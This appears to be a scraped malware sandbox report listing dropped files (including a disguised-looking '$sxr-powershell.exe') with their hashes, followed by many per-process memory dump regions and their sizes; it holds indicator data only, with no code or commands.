6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\System32\ucrtbased.dll
Filesize
1.8MB

MD5
7873612dddd9152d70d892427bc45ef0

SHA1
ab9079a43a784471ca31c4f0a34b698d99334dfa

SHA256
203d10b0deaea87d5687d362ba925289a13e52b5df55b9de58ba534290af27bf

SHA512
d988e9ff11017465b019cf3b599ef7597d2c44fc37cbee9e846dee51990ca5dc45942cc183d9d25c1dfd84f33f922c2ceead6efc1ead19e8eecb509dfb78a083

Download Submit
C:\Windows\System32\vcruntime140_1d.dll
Filesize
52KB

MD5
9ef28981adcbf4360de5f11b8f4ecff9

SHA1
219aaa1a617b1dfa36f3928bd1020e410666134f

SHA256
8caaca1bfc909fcb972ceade7be7b80b5855a4621562ee32a10c9903b616d49a

SHA512
ef7f0b25fae749e6134269683f973fef37dfa1969fa4fa0567378ada073c36da4feb17b62d3282c443f4d3ba8b4aeb39063c607c848ade095880d981141adb9c

Download Submit
C:\Windows\System32\vcruntime140d.dll
Filesize
162KB

MD5
a366d6623c14c377c682d6b5451575e6

SHA1
a8894fcfb3aa06ad073b1f581b2e749b54827971

SHA256
7ed89c668d8ec04c1a0a73f35702b8e0d9819e13e6e7c51c4ac0e0abda6683e6

SHA512
cc7da40652209337d2122cafc903d3c11e31b5a37baf2247034e2f3e1de255e58d0e27fc134ce60a6812e6674fd8bc899f2b434dfc1160053f684cf220e6cb11

Download Submit
\??\pipe\LOCAL\crashpad_4244_UGJTXJASTKHJDIPR
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/224-893-0x000001F9078D0000-0x000001F9078E0000-memory.dmp

Filesize
64KB

Download
memory/404-895-0x0000026F23010000-0x0000026F23020000-memory.dmp

Filesize
64KB

Download
memory/404-894-0x0000026F23010000-0x0000026F23020000-memory.dmp

Filesize
64KB

Download
memory/512-958-0x000001D99D110000-0x000001D99D137000-memory.dmp

Filesize
156KB

Download
memory/612-925-0x00000201A5550000-0x00000201A5571000-memory.dmp

Filesize
132KB

Download
memory/612-926-0x00000201A5970000-0x00000201A5997000-memory.dmp

Filesize
156KB

Download
memory/612-928-0x00007FFD85550000-0x00007FFD85560000-memory.dmp

Filesize
64KB

Download
memory/612-953-0x00000201A5970000-0x00000201A5997000-memory.dmp

Filesize
156KB

Download
memory/664-929-0x000001B532280000-0x000001B5322A7000-memory.dmp

Filesize
156KB

Download
memory/664-955-0x000001B532280000-0x000001B5322A7000-memory.dmp

Filesize
156KB

Download
memory/664-932-0x00007FFD85550000-0x00007FFD85560000-memory.dmp

Filesize
64KB

Download
memory/708-1012-0x000002CDBB2D0000-0x000002CDBB2F7000-memory.dmp

Filesize
156KB

Download
memory/776-728-0x0000000140000000-0x0000000140004000-memory.dmp

Filesize
16KB

Download
memory/776-730-0x0000000140000000-0x0000000140004000-memory.dmp

Filesize
16KB

Download
memory/944-938-0x0000023F4AE50000-0x0000023F4AE77000-memory.dmp

Filesize
156KB

Download
memory/944-956-0x0000023F4AE50000-0x0000023F4AE77000-memory.dmp

Filesize
156KB

Download
memory/944-942-0x00007FFD85550000-0x00007FFD85560000-memory.dmp

Filesize
64KB

Download
memory/1016-943-0x00007FFD85550000-0x00007FFD85560000-memory.dmp

Filesize
64KB

Download
memory/1016-939-0x000001C9A5BC0000-0x000001C9A5BE7000-memory.dmp

Filesize
156KB

Download
memory/1016-957-0x000001C9A5BC0000-0x000001C9A5BE7000-memory.dmp

Filesize
156KB

Download
memory/1048-1016-0x0000015CBCE60000-0x0000015CBCE87000-memory.dmp

Filesize
156KB

Download
memory/1104-1022-0x0000025710DB0000-0x0000025710DD7000-memory.dmp

Filesize
156KB

Download
memory/1144-1026-0x00000203662F0000-0x0000020366317000-memory.dmp

Filesize
156KB

Download
memory/1152-1033-0x0000027636580000-0x00000276365A7000-memory.dmp

Filesize
156KB

Download
memory/1216-1039-0x0000016AFF760000-0x0000016AFF787000-memory.dmp

Filesize
156KB

Download
memory/1308-1044-0x000002BF91B00000-0x000002BF91B27000-memory.dmp

Filesize
156KB

Download
memory/1344-1050-0x000001B707B20000-0x000001B707B47000-memory.dmp

Filesize
156KB

Download
memory/1976-787-0x000002831DFA0000-0x000002831DFB0000-memory.dmp

Filesize
64KB

Download
memory/1976-786-0x000002831DFA0000-0x000002831DFB0000-memory.dmp

Filesize
64KB

Download
memory/2552-788-0x00000174BE460000-0x00000174BE470000-memory.dmp

Filesize
64KB

Download
memory/2552-789-0x00000174BE460000-0x00000174BE470000-memory.dmp

Filesize
64KB

Download
memory/2856-839-0x000002143CA30000-0x000002143CA40000-memory.dmp

Filesize
64KB

Download
memory/2856-841-0x000002143CA30000-0x000002143CA40000-memory.dmp

Filesize
64KB

Download
memory/2916-705-0x0000012098440000-0x0000012098450000-memory.dmp

Filesize
64KB

Download
memory/2916-724-0x00007FFDC54D0000-0x00007FFDC56C5000-memory.dmp

Filesize
2.0MB

Download
memory/2916-719-0x0000012098440000-0x0000012098450000-memory.dmp

Filesize
64KB

Download
memory/2916-944-0x00007FFDC54D0000-0x00007FFDC56C5000-memory.dmp

Filesize
2.0MB

Download
memory/2916-706-0x0000012098440000-0x0000012098450000-memory.dmp

Filesize
64KB

Download
memory/2916-720-0x0000012098440000-0x0000012098450000-memory.dmp

Filesize
64KB

Download
memory/2916-721-0x0000012098440000-0x0000012098450000-memory.dmp

Filesize
64KB

Download
memory/2916-717-0x0000012098440000-0x0000012098450000-memory.dmp

Filesize
64KB

Download
memory/2916-726-0x00007FFDC54D0000-0x00007FFDC56C5000-memory.dmp

Filesize
2.0MB

Download
memory/2916-725-0x00007FFDC49D0000-0x00007FFDC4A8E000-memory.dmp

Filesize
760KB

Download
memory/3356-910-0x00007FFDC54D0000-0x00007FFDC56C5000-memory.dmp

Filesize
2.0MB

Download
memory/3356-921-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/3356-920-0x00007FFDC49D0000-0x00007FFDC4A8E000-memory.dmp

Filesize
760KB

Download
memory/3356-907-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/3356-909-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/4316-145-0x000002DFAC180000-0x000002DFAC190000-memory.dmp

Filesize
64KB

Download
memory/4316-144-0x000002DFAC180000-0x000002DFAC190000-memory.dmp

Filesize
64KB

Download
memory/4316-133-0x000002DFAC150000-0x000002DFAC172000-memory.dmp

Filesize
136KB

Download
memory/4316-148-0x000002DFACF20000-0x000002DFAD13C000-memory.dmp

Filesize
2.1MB

Download
memory/4316-143-0x000002DFAC180000-0x000002DFAC190000-memory.dmp

Filesize
64KB

Download
memory/4836-840-0x0000012FD3A60000-0x0000012FD3A61000-memory.dmp

Filesize
4KB

Download
memory/4836-822-0x0000012FD3950000-0x0000012FD3951000-memory.dmp

Filesize
4KB

Download
memory/4836-824-0x0000012FD39D0000-0x0000012FD39D1000-memory.dmp

Filesize
4KB

Download
memory/4836-835-0x0000012FD39D0000-0x0000012FD39D1000-memory.dmp

Filesize
4KB

Download
memory/4836-838-0x0000012FD3A60000-0x0000012FD3A61000-memory.dmp

Filesize
4KB

Download
memory/4836-801-0x0000012FCADC0000-0x0000012FCADD0000-memory.dmp

Filesize
64KB

Download
memory/4836-805-0x0000012FCB660000-0x0000012FCB670000-memory.dmp

Filesize
64KB

Download
memory/4836-844-0x0000012FD3A70000-0x0000012FD3A71000-memory.dmp

Filesize
4KB

Download
memory/4836-843-0x0000012FD3A70000-0x0000012FD3A71000-memory.dmp

Filesize
4KB

Download
memory/5012-690-0x00007FFDA1A70000-0x00007FFDA22CF000-memory.dmp

Filesize
8.4MB

Download
memory/5012-754-0x0000024DEBF40000-0x0000024DEBF50000-memory.dmp

Filesize
64KB

Download
memory/5012-697-0x0000024DEBF40000-0x0000024DEBF50000-memory.dmp

Filesize
64KB

Download
memory/5012-722-0x0000024DEBF40000-0x0000024DEBF50000-memory.dmp

Filesize
64KB

Download
memory/5012-723-0x00007FFDA1A70000-0x00007FFDA22CF000-memory.dmp

Filesize
8.4MB

Download
memory/5012-693-0x0000024DE9CE0000-0x0000024DE9CF8000-memory.dmp

Filesize
96KB

Download
memory/5012-681-0x0000024DE8810000-0x0000024DE995A000-memory.dmp

Filesize
17.3MB

Download
memory/5012-682-0x0000024DEBF40000-0x0000024DEBF50000-memory.dmp

Filesize
64KB

Download
memory/5012-692-0x00007FFDA6A80000-0x00007FFDA6BCE000-memory.dmp

Filesize
1.3MB

Download
memory/5012-698-0x00007FFDA1A70000-0x00007FFDA22CF000-memory.dmp

Filesize
8.4MB

Download
memory/5012-699-0x00007FFDA1A70000-0x00007FFDA22CF000-memory.dmp

Filesize
8.4MB

Download
memory/5012-691-0x00007FFDA1A70000-0x00007FFDA22CF000-memory.dmp

Filesize
8.4MB

Download
memory/5012-765-0x00007FFDA1A70000-0x00007FFDA22CF000-memory.dmp

Filesize
8.4MB

Download
memory/5012-718-0x00007FFDA1A70000-0x00007FFDA22CF000-memory.dmp

Filesize
8.4MB

Download
memory/5012-696-0x00007FFDA1A70000-0x00007FFDA22CF000-memory.dmp

Filesize
8.4MB

Download
memory/5012-933-0x00007FFDA1A70000-0x00007FFDA22CF000-memory.dmp

Filesize
8.4MB

Download
memory/5928-759-0x00007FFDC49D0000-0x00007FFDC4A8E000-memory.dmp

Filesize
760KB

Download
memory/5928-984-0x000001BBB8C10000-0x000001BBB8C22000-memory.dmp

Filesize
72KB

Download
memory/5928-758-0x00007FFDC54D0000-0x00007FFDC56C5000-memory.dmp

Filesize
2.0MB

Download
memory/5928-757-0x000001BB9D1D0000-0x000001BB9D1E0000-memory.dmp

Filesize
64KB

Download
memory/5928-756-0x000001BB9D1D0000-0x000001BB9D1E0000-memory.dmp

Filesize
64KB

Download
memory/5928-755-0x000001BB9D1D0000-0x000001BB9D1E0000-memory.dmp

Filesize
64KB

Download
memory/5928-892-0x000001BBB9320000-0x000001BBB94E2000-memory.dmp

Filesize
1.8MB

Download
memory/5928-891-0x000001BBB8D50000-0x000001BBB8E02000-memory.dmp

Filesize
712KB

Download
memory/5928-763-0x00007FFDC54D0000-0x00007FFDC56C5000-memory.dmp

Filesize
2.0MB

Download
memory/5928-905-0x00007FFDC54D0000-0x00007FFDC56C5000-memory.dmp

Filesize
2.0MB

Download
memory/5928-990-0x000001BBB9670000-0x000001BBB96AC000-memory.dmp

Filesize
240KB

Download
memory/5928-764-0x00007FFDC49D0000-0x00007FFDC4A8E000-memory.dmp

Filesize
760KB

Download
memory/5928-890-0x000001BBB8C40000-0x000001BBB8C90000-memory.dmp

Filesize
320KB

Download
memory/5928-924-0x000001BB9D1D0000-0x000001BB9D1E0000-memory.dmp

Filesize
64KB

Download
memory/6060-837-0x00000261AA8F0000-0x00000261AA900000-memory.dmp

Filesize
64KB

Download
memory/6060-836-0x00000261AA8F0000-0x00000261AA900000-memory.dmp

Filesize
64KB

Download
memory/6572-876-0x0000026C57F90000-0x0000026C57FA0000-memory.dmp

Filesize
64KB

Download
memory/6696-878-0x00000267197B0000-0x00000267197C0000-memory.dmp

Filesize
64KB

Download
memory/6696-877-0x00000267197B0000-0x00000267197C0000-memory.dmp

Filesize
64KB

Download